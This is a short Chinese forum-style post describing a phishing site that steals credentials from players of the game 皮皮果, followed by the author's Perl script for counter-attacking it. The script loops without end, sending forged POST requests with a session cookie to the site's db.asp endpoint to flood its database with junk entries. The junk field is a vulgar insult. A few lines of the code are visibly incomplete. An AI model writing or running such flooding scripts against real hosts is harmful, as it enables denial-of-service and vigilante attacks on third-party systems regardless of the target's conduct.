一个皮皮果的游戏很火
估计很多人想黑
偶然发现一个钓鱼站:
http://ppgpergame.com/
钓用户名与密码
抓包后发现数据会发送到: http://ppgpergame.com/db.asp保存
所以就有了下面的脚本:
my $count = ;
while(){
use LWP::UserAgent;
my $ua = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => 'http://ppgpergame.com/db.asp');
$req->content_type('application/x-www-form-urlencoded');
$req->header('Cookie' => "ASPSESSIONIDQSRSQRQT=JGGPHMLCGNGPMCMHJFEADDIH");
$req->content('__VIEWSTATE=xh%2F2rhoU7BXJQVkhLqWlQFoDwiHE5G84c7bOCZBTKr4WqaFqAdRzvf9329qzGj8Gqd2NnXt2xItQJ1zkQ%2BEvzygE96CkbDtlgeRteOtQbfmi6AB8%2FiXJ4jyauiEvN%2BnA&__EVENTVALIDATION=dPbSacZAFdINOCpzCAR9Ie6LceBqX7SSEHcanKlD%2BkxCDfr2M5ZdgZumSxhVCnr92fi6rndo39J5Mb1jGgEoOFsx062FWDQiqGPuEk%2FpK2MqXohxmh38zNOfz%2F60jfP4nDpHTUCP536fgCr%2BOIFVZg%3D%3D&i=%B2%D9%C4%E3%C2%EAB&BtnSave=%C8%B7%C8%CF'); my $res = $ua->request($req);
print "发送代码为:",$res->status_line,"\n";
print "第 $count 条数据发送完毕!\n";
$count ++;
}
post数据大概是 XXXOOOO ni M类型, 不多说